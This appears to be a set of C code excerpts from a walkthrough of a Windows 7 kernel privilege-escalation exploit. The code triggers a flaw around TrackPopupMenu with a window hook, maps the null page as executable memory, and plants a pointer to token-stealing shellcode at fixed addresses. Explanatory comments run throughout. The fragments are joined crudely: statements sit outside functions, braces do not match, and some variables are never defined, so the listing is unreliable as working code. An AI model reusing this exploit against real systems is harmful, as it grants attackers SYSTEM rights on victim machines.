main(){

       HWND main_wnd = CreateWindowA(wnd_class.lpszClassName, "", WS_OVERLAPPEDWINDOW | WS_VISIBLE, 0, 0, 640, 480, NULL, NULL, wnd_class.hInstance, NULL);

}

    //Creates an empty popup menu

    HMENU MenuOne = CreatePopupMenu();

    MENUITEMINFOA MenuOneInfo = { 0 };

    //Default size

    MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);

    //Selects what properties to retrieve or set when GetMenuItemInfo/SetMenuItemInfo are called, in this case only dwTypeData which the contents of the menu item.

    MenuOneInfo.fMask = MIIM_STRING;

    BOOL insertMenuItem = InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo);

    HMENU MenuTwo = CreatePopupMenu();

    MENUITEMINFOA MenuTwoInfo = { 0 };

    MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);

    //On this window hSubMenu should be included in Get/SetMenuItemInfo

    MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);

    //The menu is a sub menu of the first menu

    MenuTwoInfo.hSubMenu = MenuOne;

    //The contents of the menu item - in this case nothing

    MenuTwoInfo.dwTypeData = "";

    //The length of the menu item text - in the case 1 for just a single NULL byte

    MenuTwoInfo.cch = 1;

    insertMenuItem = InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo);

    HHOOK setWindowsHook = SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId());

    TrackPopupMenu(

        MenuTwo, //Handle to the menu we want to display, for us its the submenu we just created.

        0, //Options on how the menu is aligned, what clicks are allowed etc, we don't care.

        0, //Horizontal position - left hand side

        0, //Vertical position - Top edge

        0, //Reserved field, has to be 0

        main_wnd, //Handle to the Window which owns the menu

        NULL //This value is always ignored...

        );

    //tidy up the screen

typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(

    IN  HANDLE  ProcessHandle,

    IN  PVOID   *BaseAddress,

    IN  PULONG  ZeroBits,

    IN  PSIZE_T RegionSize,

    IN  ULONG   AllocationType,

    IN  ULONG   Protect

    );

//Gets a pointer to the Win32ThreadInfo structure for the current thread by indexing into the Thread Execution Block for the current thread

DWORD __stdcall GetPTI() {

    __asm {

        mov eax, fs:18h //eax pointer to TEB

            mov eax, [eax + 40h] //get pointer to Win32ThreadInfo

    }

}

//Loads ntdll.dll into the processes memory space and returns a HANDLE to it

    HMODULE hNtdll = LoadLibraryA("ntdll");

    lNtAllocateVirtualMemory pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

    DWORD base_address = 1;

    //Aritary size which is probably big enough - it'll get rounded up to the next memory page boundary anyway

    SIZE_T region_size = 0x1000;

    NTSTATUS tmp = pNtAllocateVirtualMemory(

        GetCurrentProcess(), //HANDLE ProcessHandle => The process the mapping should be done for, we pass this process.

        (LPVOID*)(&base_address),// PVOID *BaseAddress => The base address we want our memory allocated at, this will be rounded down to the nearest page boundary and the new value will written to it

        0, //ULONG_PTR ZeroBits => The number of high-order address bits that must be zero in the base address, this is only used when the base address passed is NULL

        &region_size, //RegionSize => How much memory we want allocated, this will be rounded up to the nearest page boundary and the updated value will be written to the variable

        (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN),//ULONG AllocationType => What type of allocation to be done - the chosen flags mean the memory will allocated at the highest valid address and will immediately be reserved and commited so we can use it.

        PAGE_EXECUTE_READWRITE //ULONG Protect => The page protection flags the memory should be created with, we want RWX

        );

    void* pti_loc = (void *)0x3;

    void* check_loc = (void *)0x11;

    void* shellcode_loc = (void *)0x5b;

    *(LPDWORD)pti_loc = pti;

    *(LPBYTE)check_loc = 0x4;

    *(LPDWORD)shellcode_loc = (DWORD)TokenStealingShellcodeWin7;